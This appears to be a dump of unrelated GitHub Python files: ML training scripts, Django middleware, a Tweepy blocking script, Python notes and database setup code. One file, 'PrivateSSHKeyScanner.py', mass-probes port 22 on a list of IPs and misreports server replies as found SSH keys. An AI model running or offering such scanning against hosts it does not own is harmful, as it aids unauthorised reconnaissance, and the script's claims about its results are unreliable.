str(mydate.time()).split(':')\n if time[1] == '15':\n time = time[0] + ':00'\n else:\n hour = int(time[0]) + 1\n if len(str(hour)) < 2:\n hour = '0' + str(hour)\n time = str(hour) + ':00'\n mydateTime = date + ' ' + time\n if mydateTime in dateTimes:\n myBins.append(myBins1[dateTimes.index(mydateTime)])\n else:\n myBins.append(0.0)","repo_name":"mikejwx/main-bin","sub_path":"surfaceParseVis.py","file_name":"surfaceParseVis.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"11412168529","text":"# 微调\nimport os\nimport torch\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils import data\nfrom torch import nn\nfrom d2l import torch as d2l\nfrom func import show_images\nfrom matplotlib import pyplot as plt\n\n# 数据增强\n# 使用RGB通道的均值和标准差,以标准化每个通道\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])\ntrain_augs = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize])\ntest_augs = transforms.Compose([\n torchvision.transforms.Resize(256),\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n normalize])\n\n# 热狗数据集 http://d2l-data.s3-accelerate.amazonaws.com/hotdog.zip\ntrain_imgs = torchvision.datasets.ImageFolder(os.path.join('./data/hotdog', 'train'),transform=train_augs)\ntest_imgs = torchvision.datasets.ImageFolder(os.path.join('./data/hotdog', 'test'),transform=test_augs)\nhotdogs = [train_imgs[i][0] for i in range(8)]\nnot_hotdogs = [train_imgs[-i - 1][0] for i in range(8)]\nshow_images(hotdogs + not_hotdogs, 2, 8, scale=1.4)\nplt.show()\n\ntrain_iter = data.DataLoader(train_imgs,batch_size=128,shuffle=True,num_workers=0)\ntest_iter = data.DataLoader(test_imgs,batch_size=128,shuffle=False,num_workers=0)\nprint(next(iter(train_iter))[0].shape)\n\n# 使用微调\nnet = torchvision.models.resnet18(pretrained=True)\nprint(net)\nprint(net.fc)\n\nnet.fc = nn.Linear(net.fc.in_features, 2)\nnn.init.xavier_uniform_(net.fc.weight)\n\n\nlr , num_epochs = 5e-4, 10\n\nloss = nn.CrossEntropyLoss()\nparams_1x = [param for name, param in net.named_parameters()\n if name not in [\"fc.weight\", \"fc.bias\"]]\ntrainer = torch.optim.SGD([{'params': params_1x},\n {'params': net.fc.parameters(), 'lr': lr * 10}],\n lr=lr, weight_decay=0.001)\n\nd2l.train_ch13(net, train_iter, test_iter, loss, trainer, num_epochs,[torch.device('cuda:0')])\n\n\n# 不使用微调\nnet = torchvision.models.resnet18()\nnet.fc = nn.Linear(net.fc.in_features, 2)\ntrainer = torch.optim.SGD(net.parameters(),lr = 0.05 , weight_decay = 0.001)\nd2l.train_ch13(net, train_iter, test_iter, loss, trainer, num_epochs,[torch.device('cuda:0')])\n\n\nplt.show()","repo_name":"prety-good/D2l-notes","sub_path":"fine-tuning.py","file_name":"fine-tuning.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"11067426262","text":"# https://practice.geeksforgeeks.org/problems/count-the-reversals0401/1\n\n# CodeHelp Stack\n\ndef countRev (s):\n # if odd sized string then impossible to make pairs\n if len(s) & 1: return -1\n \n ans = 0\n st = []\n for c in s:\n if c == '{':\n st.append(c)\n else:\n if st and st[-1] == '{':\n st.pop()\n else:\n st.append(c)\n \n # if stack is still not empty, let's count reversals\n while st:\n a = st.pop()\n b = st.pop()\n if a == b:\n ans += 1\n else:\n ans += 2\n\n return ans ","repo_name":"anshawasthi01/Supreme-DSA","sub_path":"11. Stack/5. Assignments/02. Count the or (Minimum Bracket) Reversals[GFG].py","file_name":"02. Count the or (Minimum Bracket) Reversals[GFG].py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"14259633177","text":"from django.conf import settings\nfrom django.http import HttpResponseRedirect\n\n\nclass LoginMiddleware(object):\n NEED_AUTHENTICATION_URL = [\n \"/\",\n \"/todo/\"\n ]\n\n URL_CONTAINS = [\n [\"/todo/\", \"/edit/\"],\n [\"/todo/\", \"/delete/\"],\n [\"/logout/\"]\n ]\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n if request.user.id is None and self.contains(request, self.URL_CONTAINS):\n return HttpResponseRedirect(\"/login/\")\n\n response = self.get_response(request)\n return response\n\n def contains(self, request, paths=None):\n if request.path == \"/\":\n return True\n\n if paths is not None and type(paths) is list:\n for path in paths:\n if type(path) is list:\n count = 0\n for item in path:\n if item in request.path:\n count += 1\n\n if count == len(path):\n return True\n else:\n if path in request.path:\n return True\n\n return False\n\n\nclass HttpRedirect(object):\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n request.back = request.META.get(\"HTTP_REFERER\")\n\n response = self.get_response(request)\n return response\n","repo_name":"Naveigell/django-login-register-and-todo-app","sub_path":"main/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31574240504","text":"import tweepy\nimport json\n\nwith open(\"C:\\\\Users\\\\valen\\\\Desktop\\\\twitter_app\\\\twitter_keys.txt\", \"r\") as file:\n data = json.load(file)\n api_key = f\"{data['api_key']}\"\n api_secret = f\"{data['api_secret']}\"\n access_token = f\"{data['access_token']}\"\n access_token_secret = f\"{data['access_token_secret']}\"\n bearer_token = f\"{data['bearer_token']}\"\n client_id = f\"{data['client_id']}\"\n client_secret = f\"{data['client_secret']}\"\n\n# Auth\nauth = tweepy.OAuthHandler(api_key, api_secret)\nauth.set_access_token(access_token, access_token_secret)\napi =tweepy.API(auth,wait_on_rate_limit=True)\nclient = tweepy.Client(bearer_token)\n\ntweet_id = \"\"\ntweet = api.get_status(tweet_id)\n\napi.create_block(screen_name=tweet._json[\"user\"][\"screen_name\"]) #block who tweeted\nusers = client.get_liking_users(tweet_id)\n\nlikes_count = int(tweet._json[\"favorite_count\"])\nprint(\"Likes count: \", likes_count, \"\\n\")\n\nverified_accounts = []\nfollowing_accounts = []\nn=0\nwhile(True):\n if users.meta[\"result_count\"] == 0:\n break\n for x in users.data:\n user = api.get_user(screen_name=x)\n \n if user._json[\"verified\"] != True and user._json[\"following\"] != True:\n api.create_block(screen_name=x.username)\n print(x.username, \"blocked\")\n n=n+1\n else: \n if user._json[\"verified\"] == True:\n verified_accounts.append(x.username)\n \n if user._json[\"following\"] == True:\n following_accounts.append(x.username)\n \n print(\"\\nUsers remain:\", likes_count-n, \"\\n\")\n users = client.get_liking_users(tweet_id, pagination_token=users.meta[\"next_token\"])\n\nprint(\"\\n\",n, \" users blocked\\n\", sep=\"\")\n\nprint(\"Verified accounts not blocked:\\n\", verified_accounts)\nprint(\"Following accounts not blocked:\\n\", following_accounts)\n","repo_name":"Ngiok/twitter_app","sub_path":"block_tweet_liking_users.py","file_name":"block_tweet_liking_users.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2471727568","text":"my_str=\"hello how are you\"\n# total number of characters in a string\nprint(len(my_str))\n# accessing last elemenent \nprint(my_str[len(my_str) - 1]) \n# negative indexing \nprint(my_str[-1]) ; # last character \nprint(my_str[-5]) ; # 5th last character \n# string slicing \n# start and end+1\nprint(my_str[2:7]) ;\n#print whole string\nprint(my_str[:])\n# only the last two characters are left \nprint(my_str[:-2]) ;\n#lowercase \nprint(my_str.lower()) \n#uppercase\nprint(my_str.upper()) \n# Capital first character of each word \nprint(my_str.title()) \n# return the index of the first occurrence of the word \nprint(my_str.find(\"how\"))\nprint(my_str.find(\"hoo\"))\n# splits the string with space \" \" and creates a list \nlist=my_str.split(\" \")\nprint(list)\n# repeat a number n no of times\nprint(\"hello \"*5)\n\n# lists in python\nmy_list=[5,6,7,8,9]\n# add element at the end of list\nmy_list.append(33)\n# inserts 88 at index i at which index you want to insert \nmy_list.insert(1,88) \n# delete the last element \n# pop function can also take an index if you want to delete at an specefic index \nmy_list.pop()\n# reverse a list \nmy_list.reverse()\n# sorts in ascending order \nmy_list.sort()\n# descending order \nmy_list.sort(reverse=True)\n# in operator \n8 in my_list\n\n# list comprehension\nnew_list=[] \nfor ele in my_list: \n new_list.append(ele**2) \n\nnew_list2=[ele**2 for ele in my_list] \n\n# tuples are similar to a list but you cannot change elements inside a tuple\ntup=(8,9,'Hello',88) \n\n# set contains only unique elements\nmy_set={9,7,7,1,8,9,7,5,1}\n# no duplicate elements \nprint(my_set)\n# add elements\nmy_set.add(99)\n# remove element \nmy_set.remove(8)\n\nsome_list=[6,3,3,8,3,4,5,9]\nmy_new_set=set(some_list)\n# some_list=list(my_new_set)\n\n# dictionaries\nuser_info={\n \"name\":\"Shobhit\",\n \"age\":21,\n \"nationality\":\"Indian\"\n}\n\n# to get value of key\nuser_info.get(\"hobby\")\n# display all keys in dictionary\nuser_info.keys()\n# display all values in dictionary \nuser_info.values() \n# display {key,value} pair in tuples \nuser_info.items() \n# iterate over a list \nfor(k,v) in user_info.items(): \n print(k,\" : \",v)\n# delete key \nuser_info.pop('nationality')\n\n\nlst1 = [2, 3, 4, 5]\nlst2 = [1, 2, 3, 4, 5]\n\nresult = lst1 + lst2\nprint(result)\n\nnewList=[i**2 if i%2==0 else i**3 for i in range(0,len(lst1))]\n\na = [1, 5, 3, 2, 4, 3, 2]\nb = [5, 3, 4, 2, 1]\n\nprint(set(a) == set(b))\n","repo_name":"kumarshobhit/Python-master-course","sub_path":"DataScience/ds.py","file_name":"ds.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"38725037916","text":"import PIL\nimport os.path\n# Open the files in the same directory as the Python script\ndirectory = os.getcwd() \n#make a mask in the shape of a recycle sign\ndef recycle_mask(original_image):\n width,height = original_image.size\n recycle_file = os.path.join(directory, 'Recycle Sign.png')\n recycle_img = PIL.Image.open(recycle_file)\n recycle_size = recycle_img.resize((width, height))\n result = PIL.Image.new('RGBA', original_image.size, (35,255,35,100))\n result.paste(original_image, (8,10), mask=recycle_size) \n return result\n\n#Get images in the current working directory\ndef get_images(directory=None):\n \"\"\" Returns PIL.Image objects for all the images in directory.\n \n If directory is not specified, uses current directory.\n Returns a 2-tuple containing \n a list with a PIL.Image object for each image file in root_directory, and\n a list with a string filename for each image file in root_directory\n \"\"\"\n \n if directory == None:\n directory = os.getcwd() # Use working directory if unspecified\n \n image_list = [] # Initialize aggregaotrs\n file_list = []\n \n directory_list = os.listdir(directory) # Get list of files\n for entry in directory_list:\n absolute_filename = os.path.join(directory, entry)\n try:\n image = PIL.Image.open(absolute_filename)\n file_list += [entry]\n image_list += [image]\n except IOError:\n pass # do nothing with errors tying to open non-images\n return image_list, file_list\n#Make a new directory for the modified images\ndef recycle_mask_to_all_images(directory=None):\n \"\"\" Saves a modfied version of each image in directory.\n \n Uses current directory if no directory is specified. \n Places images in subdirectory 'modified', creating it if it does not exist.\n New image files are of type PNG and have transparent rounded corners.\n \"\"\"\n \n if directory == None:\n directory = os.getcwd() # Use working directory if unspecified\n \n # Create a new directory 'modified'\n new_directory = os.path.join(directory, 'modified_earth')\n try:\n os.mkdir(new_directory)\n except OSError:\n pass # if the directory already exists, proceed \n \n #load all the images\n image_list, file_list = get_images(directory) \n\n #go through the images and save modified versions\n for n in range(len(image_list)):\n # Parse the filename\n filename, filetype = os.path.splitext(file_list[n])\n \n # Round the corners with radius = 30% of short side\n new_image = recycle_mask(image_list[n])\n #save the altered image, suing PNG to retain transparency\n new_image_filename = os.path.join(new_directory, filename + '.png')\n new_image.save(new_image_filename) ","repo_name":"andfritson/1.4.7","sub_path":"AFritson_1_4_7.py","file_name":"AFritson_1_4_7.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12167456028","text":"import socket\nimport threading\nimport sys\n\ndef ssh_scan(ip, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(5)\n try:\n sock.connect((ip, port))\n sock.send(b'\\x00\\x00\\x00\\x07ssh-keyscan')\n data = sock.recv(1024)\n if data:\n print(f\"[+] {ip}:{port} - SSH Key found: {data}\")\n else:\n print(f\"[-] {ip}:{port} - No SSH Key found\")\n except:\n print(f\"[-] {ip}:{port} - Connection refused\")\n finally:\n sock.close()\n\ndef main():\n if len(sys.argv) < 2:\n print(\"[-] Please provide a file with IPs\")\n sys.exit()\n\n filename = sys.argv[1]\n with open(filename, 'r') as f:\n ip_list = f.readlines()\n\n for ip in ip_list:\n t = threading.Thread(target=ssh_scan, args=(ip.strip(), 22))\n t.start()\n\nif __name__ == '__main__':\n main()\n","repo_name":"codex15/cdx","sub_path":"PrivateSSHKeyScanner.py","file_name":"PrivateSSHKeyScanner.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17138853159","text":"#! /usr/bin/env python\nimport os, random, sys, math\n\nimport pygame\nfrom pygame.locals import *\n\nfrom configuracion import *\nfrom extras import *\nfrom funcionesSeparador import *\nfrom funcionesVACIAS import *\nfrom menu import*\nfrom principal import*\n\ndef lectura2(archivo, lista):\n nueva=archivo.readlines()\n palabra=\"\"\n for i in range(len(nueva)):\n for letra in (nueva[i]):\n if (letra>=\"a\" and letra<=\"z\" or letra==\"ñ\") or (letra>=\"0\" and letra <=\"9\"):\n palabra=palabra+letra\n else:\n lista.append(palabra)\n palabra=\"\"\n\ndef esta(jugador,nombres):\n False\n for elemento in nombres:\n if elemento==jugador:\n return True\n\ndef puntaje(nombres,mejores,jugador,puntos):\n auxMej=[]\n auxNom=[]\n\n i=0\n while i < (len(nombres)):\n if int(puntos)>= int(mejores[i]) and not(esta(jugador,auxNom)):\n auxMej.append(puntos)\n auxNom.append(jugador)\n auxMej.append(mejores[i])\n auxNom.append(nombres[i])\n else:\n auxMej.append(mejores[i])\n auxNom.append(nombres[i])\n i=i+1\n\n for i in range(len(auxMej)-1):\n nombres[i]=auxNom[i]\n mejores[i]=auxMej[i]\n\n\ndef menu2(puntos):\n res = (720,720)\n\n screen = pygame.display.set_mode(res)\n\n color = (255,255,255)\n\n color_light = (170,170,170)\n\n color_dark = (100,100,100)\n\n defaultFont= pygame.font.Font( pygame.font.get_default_font(), TAMANNO_LETRA)\n #Abrir lista de nombres y puntos\n LiNombres=[]\n LiMejores=[]\n #Tomar las lista de los archivos\n nombres=open(\"nombres.txt\",\"r\")\n lectura2(nombres,LiNombres)\n nombres.close()\n mejores=open(\"mejores.txt\",\"r\")\n lectura2(mejores,LiMejores)\n mejores.close()\n\n #Nombre que no esté en la lista de nombres\n jugador=(input(\"Ingrese su nombre Máximo de 6 letras\"))\n while esta(jugador,LiNombres) and len(jugador)<=6:\n jugador=input(\"Ingrese otro nombre\")\n\n\n puntaje(LiNombres,LiMejores,jugador,puntos)\n\n titulo=defaultFont.render(\"Lograste \" + str(puntos) + \" puntos\" , True , COLOR_LETRAS)\n top5=defaultFont.render(\"TOP 5\" , True , COLOR_LETRAS)\n nombre0 = defaultFont.render(LiNombres[0] , True , COLOR_LETRAS)\n puntos0 =defaultFont.render(str(LiMejores[0]) , True , COLOR_LETRAS)\n nombre1 = defaultFont.render(LiNombres[1] , True , COLOR_LETRAS)\n puntos1 =defaultFont.render(str(LiMejores[1]) , True , COLOR_LETRAS)\n nombre2 = defaultFont.render(LiNombres[2] , True , COLOR_LETRAS)\n puntos2 =defaultFont.render(str(LiMejores[2]) , True , COLOR_LETRAS)\n nombre3 = defaultFont.render(LiNombres[3] , True , COLOR_LETRAS)\n puntos3 =defaultFont.render(str(LiMejores[3]) , True , COLOR_LETRAS)\n nombre4 = defaultFont.render(LiNombres[4] , True , COLOR_LETRAS)\n puntos4 =defaultFont.render(str(LiMejores[4]) , True , COLOR_LETRAS)\n puesto1=defaultFont.render(\"1.\" , True , COLOR_LETRAS)\n puesto2=defaultFont.render(\"2.\" , True , COLOR_LETRAS)\n puesto3=defaultFont.render(\"3.\" , True , COLOR_LETRAS)\n puesto4=defaultFont.render(\"4.\" , True , COLOR_LETRAS)\n puesto5=defaultFont.render(\"5.\" , True , COLOR_LETRAS)\n text=defaultFont.render(\"Reintentar\" , True , COLOR_LETRAS)\n text2=defaultFont.render(\"Salir\" , True , COLOR_LETRAS)\n\n #Reescribir los archivos de nombres y puntos\n nombres=open(\"nombres.txt\",\"w\")\n for elemento in LiNombres:\n nombres.write(elemento+\"\\n\")\n nombres.close()\n mejores=open(\"mejores.txt\",\"w\")\n for elemento in LiMejores:\n mejores.write(str(elemento)+\"\\n\")\n mejores.close()\n\n while True:\n\n for ev in pygame.event.get():\n\n if ev.type == pygame.QUIT:\n if ev.type == pygame.QUIT:\n pygame.quit()\n if ev.type==KEYDOWN:\n if ev.key==K_ESCAPE:\n pygame.quit()\n quit()\n #Acción del click en botones\n if ev.type == pygame.MOUSEBUTTONDOWN:\n if 100 <= mouse[0] <= 240 and 500 <= mouse[1] <= 540:\n main()\n if 560 <= mouse[0] <= 700 and 500 <= mouse[1] <= 540:\n pygame.quit()\n\n\n screen.fill((0, 22, 142))\n\n\n\n mouse = pygame.mouse.get_pos()\n #Forma y color de botones cuando pasan por encima con el mouse.\n if 100 <= mouse[0] <= 240 and 500 <= mouse[1] <= 540:\n pygame.draw.rect(screen,color_light,[100,500,140,40])\n else:\n pygame.draw.rect(screen,color_dark,[100,500,140,40])\n\n if 560 <= mouse[0] <= 700 and 500 <= mouse[1] <= 540:\n pygame.draw.rect(screen,color_light,[560,500,140,40])\n else:\n pygame.draw.rect(screen,color_dark,[560,500,140,40])\n\n #Dibujar título\n screen.blit(titulo ,(260,100))\n screen.blit(top5 ,(315,200))\n #Dibujar puestos\n screen.blit(puesto1 ,(275,250))\n screen.blit(nombre0 ,(305,250))\n screen.blit(puntos0 ,(385,250))\n screen.blit(puesto2 ,(275,300))\n screen.blit(nombre1 ,(305,300))\n screen.blit(puntos1 ,(385,300))\n screen.blit(puesto3 ,(275,350))\n screen.blit(nombre2 ,(305,350))\n screen.blit(puntos2 ,(385,350))\n screen.blit(puesto4 ,(275,400))\n screen.blit(nombre3 ,(305,400))\n screen.blit(puntos3 ,(385,400))\n screen.blit(puesto5 ,(275,450))\n screen.blit(nombre4 ,(305,450))\n screen.blit(puntos4 ,(385,450))\n #Texto de botones\n screen.blit(text ,(120,510))\n screen.blit(text2 ,(580,510))\n\n\n\n\n pygame.display.update()","repo_name":"FacundoVaz/Cv_Facundo.Vazquez.juego.Python","sub_path":"Menu2.py","file_name":"Menu2.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29937593277","text":"#!/usr/bin/env python3\n# OACI airport list\nairports = ['LECH', 'LERI', 'LEPP', 'LEMH', 'LELL', 'LEIB',\n 'LEPA_LESJ', 'LELC', 'LEGE', 'LEAL', 'LESB', 'LEPO',\n 'LERS', 'LXGB', 'LEAM', 'LEZG', 'LEMD', 'LEBB', 'LEXJ', 'LEBA',\n 'LEVX', 'LEZL', 'LEBG', 'LESA', 'LETO', 'LELN', 'LEAS', 'LEVD',\n 'LEGT', 'LERJ', 'LESO', 'LEVT', 'LECO', 'LEST', 'LEMO', 'LEGA',\n 'LEDA', 'LESU', 'LEJR', 'LEMI', 'LETL', 'GCLP', 'GCLA', 'GCXO',\n 'GCRR', 'GSVO', 'GSAI', 'GCTS', 'GCFV', 'GCHI', 'GEML', 'LEMG',\n 'LEGR', 'LEHC', 'LEBZ', 'LEBL', 'LEAB', 'LECU_LEVS', 'GCGM', 'LEVC',\n 'LERT', 'LERL', 'LEAG', 'LEAO', 'GEHM', 'GECE', 'LECV', 'LEEC',\n 'LETA', 'LELO', 'GCXM', 'LEBT']\n","repo_name":"chiflmas/aero_charts","sub_path":"airports.py","file_name":"airports.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"gn","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26629662679","text":"Sample_dict = {\n \"beam_on\" : 1,\n \"beam_off\" : 2,\n \"nu\" : 3,\n \"nue\" : 4,\n \"dirt\" : 5,\n \"filter_cc_cpi\" : 61,\n \"filter_cc_pi0\" : 62,\n \"filter_cc_nopi\" : 63,\n \"filter_nc_cpi\" : 71,\n \"filter_nc_pi0\" : 72,\n \"filter_nc_nopi\" : 73,\n \"train_elee\" : 81,\n \"train_nu\" : 82,\n \"train_nue\" : 83,\n \"train_pi0\" : 84,\n \"train_nc_pi0\" : 85,\n \"train_cc_pi0\" : 86, #not used yet\n \"train_nopi_tight\" : 87,\n \"beam_sideband\" : 9,\n \"fake\" : 1,\n \"DetVar\" : 10\n } \n \n","repo_name":"Wouter-VDP/nuecc_python","sub_path":"helpers/gpvm/enum_sample.py","file_name":"enum_sample.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"5197633753","text":"import socket\nimport numpy as np\nimport pickle\nimport time\n#import keras\n#from keras.datasets import mnist\nimport sys\nfrom sklearn import linear_model\nfrom sklearn.externals import joblib\n\n#(x_train, y_train), (x_test, y_test) = mnist.load_data()\n# create socket object\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclf = linear_model.SGDClassifier()\nhost = 'localhost'\nport = 25000\n\n# connect to localhost\ns.connect((host, port))\nfeatures = []\nclassifications = []\n#feature = []\n#classification = []\nreceived_count = 0;\n\n############\n# Load SVM #\n############\nclf = joblib.load('mnist_svm.pkl')\nnum_samples = 0;\nnum_correct = 0;\nstartTime = time.time()\nwhile 1:\n#\tprint(classification)\n # start processing packets\n\tfeature = []\n\tendOfPacket = False\n\tbad_feature = False\n\tbad_class = False\n\twhile 1:\n\t\tbad_packet = False\n\t\tpacket_msg = s.recv(1400)\n\t\tif(not packet_msg): break\n\t\ttry:\n\t\t\tpacket = pickle.loads(packet_msg)\n\t\texcept:\n\t\t\tbad_packet = True\n\t\t\tbad_feature = True\n\t\t\tbad_class = True\n\t\t\tprint('bad packet help me!')\n\t\t\thelp_msg = pickle.dumps('bp')\n\t\t\tprint('size of outgoing', sys.getsizeof(help_msg))\n\t\t\ts.sendall(help_msg)\n\t\t\tbreak\n\t\tif(not bad_packet):\n\t\t\tif(packet == 'eoa'):\n\t\t\t\tendOfPacket = True\n\t\t\t\ts.send(pickle.dumps('gf'))\n\t\t\t\tbreak\n\t\t\tfeature.extend(packet)\n\t\t\ts.send(pickle.dumps('gp'))\n\t\n #bad_feature = False\n\t\n\t#feature_msg = s.recv(400000)\n\t#if( not feature_msg): break\n\t#try:\n #\t\tfeature = pickle.loads(feature_msg)\n\t#except:\n\t#\tbad_feature = True;\n\t#\tprint('unexpected error: ', sys.exc_info()[0])\n\t\t# send message to server saying bad feature received\n\t\t# server will try to resend\n #\ts.send(pickle.dumps('bf'))\n #if(not bad_feature):\n\t\t# send message to server saying good featrue received\n\t\t#s.send(pickle.dumps('gf'))\n\tif(not bad_packet):\n\t\tclass_msg = s.recv(1400)\n\t\tif(not class_msg): break\n\t\ttry:\n\t\t\tprint('trying classification!')\n\t\t\tclassification = pickle.loads(class_msg)\n\t\texcept:\n\t\t\tprint('bad class!!!')\n\t\t\tbad_class = True;\n\t\t\tclassification = []\n\t\t\t# send message to server saying bad classification received\n\t\t\t# server will try to resend\t\t\t\n\t\t\ts.send(pickle.dumps('bc'))\n\t\tif(not bad_class):\n\t\t\tif(type(classification) == type([])):\n\t\t\t\tclassification = []\n\t\t\t\ts.send(pickle.dumps('bc'))\n\t\t\telse:\n\t\t\t\tpredicted_class = clf.predict(np.array([feature]))\n\t\t\t\tnum_samples = num_samples+1\n\t\t\t\tprint('predicted: ', predicted_class)\n\t\t\t\tprint('actual: ', classification)\n\t\t\t\tif((predicted_class[0] - classification) < 0.1):\n\t\t\t\t\tnum_correct = num_correct+1\n\t\t\t\tscore = float(float(num_correct)/float(num_samples))\n\t\t\t\tprint('score: ', score)\n\t\t\t\ts.send(pickle.dumps('gc'))\n\nendTime = time.time()\nrunTime = endTime - startTime\nprint('Classification of', num_samples,'took', runTime,'seconds and achieved an accuracy of', score)\n#joblib.dump(clf, 'mnist_svm.pkl')\ns.close()\n","repo_name":"patmclaughlin94/DistributedCNN_SVM","sub_path":"mnist_svm_boosted_packet.py","file_name":"mnist_svm_boosted_packet.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33075284598","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('create/', views.movie_create, name='movie_create'),\n path('index/', views.movie_list, name='movie_list'),\n path('/', views.movie_detail, name='movie_detail'),\n # path('/recommend/', views.hero_movie_list, name='hero_movie_list'),\n path('/reviews/', views.review_list, name='review_list'),\n path('/reviews2/', views.review_list_login, name='review_list_login'),\n path('/review/create/', views.review_create, name='review_create'),\n path('review//', views.review_update_delete, name='review_update_delete'),\n path('rlr/', views.recommend_list_rate, name='recommend_list_rate'),\n path('/my_review/', views.my_movie_review, name='my_movie_review')\n]\n","repo_name":"5angjae/MCUR","sub_path":"final-pjt-back-master/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"18065203023","text":"# in the_bank.py\n\nclass Account(object):\n ID_COUNT = 1\n\n def __init__(self, name, **kwargs):\n self.id = self.ID_COUNT\n self.name = name\n self.__dict__.update(kwargs)\n # if hasattr(self, 'value'):\n # self.value = 0\n Account.ID_COUNT += 1\n\n def transfer(self, amount):\n self.value += amount\n\n def is_corrupted(self):\n ok = True\n attributes = list(self.__dict__.keys())\n if \"value\" not in attributes:\n return True\n if len(attributes) % 2 == 0:\n return True\n for attr in attributes:\n if attr[0] == \"b\":\n return True\n if attr.startswith(\"zip\") or attr.startswith(\"addr\"):\n ok = False\n return ok\n\n\n# in the_bank.py\n\nclass Bank(object):\n \"\"\"The bank\"\"\"\n\n def __init__(self):\n self.account = []\n self.has_b_prefix = False\n\n def add(self, account):\n self.account.append(account)\n\n def get_account(self, p):\n if isinstance(p, int):\n for account in self.account:\n if account.id == p:\n return account\n if isinstance(p, str):\n for account in self.account:\n if account.name == p:\n return account\n\n def transfer(self, origin, dest, amount: float) -> bool:\n \"\"\"\n @origin: int(id) or str(name) of the first account\n @dest: int(id) or str(name) of the destination account\n @amount: float(amount) amount to transfer\n @return True if success, False if an error occurred\n \"\"\"\n origin_account = self.get_account(origin)\n dest_account = self.get_account(dest)\n if not isinstance(origin_account, Account) or not isinstance(dest_account, Account):\n return False\n elif not origin_account.is_corrupted() and not dest_account.is_corrupted():\n value = origin_account.value\n if value >= amount and value > 0:\n origin_account.value -= amount\n dest_account.transfer(amount)\n return True\n return False\n\n def fix_account(self, p) -> bool:\n \"\"\"\n fix the corrupted account\n @account: int(id) or str(name) of the account\n @return True if success, False if an error occurred\n \"\"\"\n\n account = self.get_account(p)\n\n if isinstance(account, Account):\n if account.is_corrupted():\n attributes = list(account.__dict__.keys())\n if 'name' not in attributes:\n account.__dict__.update({'name': p})\n if 'value' not in attributes:\n account.__dict__.update({'value': 0})\n if 'addr' not in attributes:\n account.__dict__.update({'zip': ''})\n if 'addr' not in attributes:\n account.__dict__.update({'addr': ''})\n\n for attr in attributes:\n if attr.startswith('b'):\n tmp = attr\n while tmp.startswith('b'):\n tmp = tmp[1:]\n account.__dict__[tmp] = account.__dict__[attr]\n del account.__dict__[attr]\n\n if account.__dict__.__len__() % 2 == 0:\n return False\n\n if account.is_corrupted():\n return False\n return True\n","repo_name":"m0saan/42-AI-Bootcamp","sub_path":"module01/ex06/the_bank.py","file_name":"the_bank.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"19563729330","text":"from turtle import *\nfrom ex3 import draw_square\ndef draw_square(length,c):\n color(c)\n shape(\"turtle\")\n speed(0)\n for x in range(4):\n forward(length)\n left(90)\n\nfor i in range(30):\n draw_square(i * 5, 'red')\n left(17)\n penup()\n forward(i * 2)\n pendown()\n\nmainloop()\n","repo_name":"chung3011/tranngocbaochung-fundamental-c4e17","sub_path":"session6/homework/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"5442020251","text":"#! /usr/bin/env python3\r\nimport psycopg2\r\nimport sys\r\n\r\ndef main():\r\n\r\n #Connect to database\r\n conn = psycopg2.connect(\"dbname=apps2018data user=apps2018 password=hoser23709\")\r\n\r\n #Create cursor and insert values to user table.\r\n cur = conn.cursor()\r\n\r\n #User table\r\n #Primary key: userID\r\n cur.execute(\"CREATE TABLE users( \\\r\n userID int, \\\r\n password varchar NOT NULL, \\\r\n salt varchar NOT NULL, \\\r\n\t dob date NOT NULL, \\\r\n\t gender varchar NOT NULL, \\\r\n creationDateServer timestamp with time zone DEFAULT CURRENT_TIMESTAMP, \\\r\n CONSTRAINT users_pk PRIMARY KEY (userID) \\\r\n );\")\r\n\r\n #foodImages table\r\n #Primary Key: submissionID\r\n #Foreign Key: userID\r\n 